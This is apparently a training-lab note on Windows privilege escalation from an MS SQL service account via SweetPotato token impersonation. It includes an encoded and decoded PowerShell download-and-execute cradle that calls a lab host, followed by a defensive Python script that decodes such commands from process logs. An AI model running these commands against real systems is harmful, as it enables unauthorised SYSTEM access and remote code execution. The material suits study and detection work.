MS SQL Privilege Escalation

Instances often run as NT Service\MSSQLSERVER, the default service account in more modern SQL Server installations. That account holds SeImpersonatePrivilege, so the potato family of token impersonation attacks applies.

Check privileges

Seatbelt.exe TokenPrivileges

SeImpersonatePrivilege:  SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED

Rogue Potato

SweetPotato.exe -p C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -a "-w hidden -enc aQBlAHgAIAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AcwBxAGwALQAyAC4AZABlAHYALgBjAHkAYgBlAHIAYgBvAHQAaQBjAC4AaQBvADoAOAAwADgAMAAvAGMAJwApAA=="

The Base64 argument decodes to:

iex (new-object net.webclient).downloadstring('http://sql-2.dev.cyberbotic.io:8080/c')

Make sure a scripted web delivery is hosting /c (tcp-local) before running it.
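An added triage helper (not part of the original note, and not a tool from the course it references): given a process-creation command line such as the one the potato spawns above, it extracts the -enc argument, decodes the UTF-16LE Base64 and flags the download cradle and hidden window, so a defender reading Sysmon or 4688 logs can see what an encoded PowerShell launch actually ran. The flag prefixes and indicator patterns are my own heuristics, and the sample command line is constructed.

```python
import base64
import re
from typing import Dict, List, Optional

# Constructed sample: the spawned child's command line as it would appear in a
# Sysmon Event ID 1 / Security 4688 record; the -enc blob is the one from the note.
SAMPLE_CMDLINE = (
    "powershell.exe -w hidden -enc "
    "aQBlAHgAIAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ACkA"
    "LgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AcwBxAGwALQAyAC4A"
    "ZABlAHYALgBjAHkAYgBlAHIAYgBvAHQAaQBjAC4AaQBvADoAOAAwADgAMAAvAGMAJwApAA=="
)

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
ENC_FLAG = re.compile(r"(?i)(?:^|\s)[-/]e(?:ncodedcommand|ncoded|nc|n|c)?\s+([A-Za-z0-9+/=]{8,})")
HIDDEN_FLAG = re.compile(r"(?i)(?:^|\s)-w[a-z]*\s+hidden")   # -w / -WindowStyle hidden
URL_RE = re.compile(r"""(?i)\bhttps?://[^\s'")]+""")
DOWNLOAD_RE = re.compile(r"(?i)downloadstring|downloadfile|invoke-webrequest|\biwr\b")
INLINE_EXEC_RE = re.compile(r"(?i)\biex\b|invoke-expression")

def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the plaintext script behind -EncodedCommand, or None if absent/invalid."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
    except ValueError:          # binascii.Error is a ValueError subclass
        return None
    # -EncodedCommand is always UTF-16LE; a stray trailing NUL is dropped.
    return raw.decode("utf-16-le", errors="replace").rstrip("\x00")

def triage(cmdline: str) -> Dict[str, object]:
    """Decode the command and collect the indicators an analyst would pivot on."""
    decoded = decode_encoded_command(cmdline)
    findings: List[str] = []
    if HIDDEN_FLAG.search(cmdline):
        findings.append("hidden_window")
    if decoded is not None:
        if DOWNLOAD_RE.search(decoded):
            findings.append("download_cradle")
        if INLINE_EXEC_RE.search(decoded):
            findings.append("inline_exec")
    return {"decoded": decoded, "findings": findings, "urls": URL_RE.findall(decoded or "")}

if __name__ == "__main__":
    for key, value in triage(SAMPLE_CMDLINE).items():
        print(f"{key}: {value}")
```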
